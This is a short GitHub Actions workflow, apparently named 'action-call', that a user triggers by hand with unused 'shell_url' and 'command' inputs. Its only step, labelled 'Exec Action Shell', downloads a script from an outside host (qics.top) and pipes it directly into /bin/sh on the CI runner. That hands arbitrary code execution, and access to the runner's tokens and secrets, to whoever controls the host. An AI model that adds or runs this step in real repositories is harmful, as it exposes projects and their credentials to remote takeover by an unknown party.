name: action-call
on:
  workflow_dispatch:
    inputs:
        shell_url:
          required: false
          type: string
        command:
          required: false
          type: string
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - name: Exec Action Shell
      run: |
        curl -fsSL "https://www.qics.top/shell/gitaction/action.sh" | /bin/sh
    
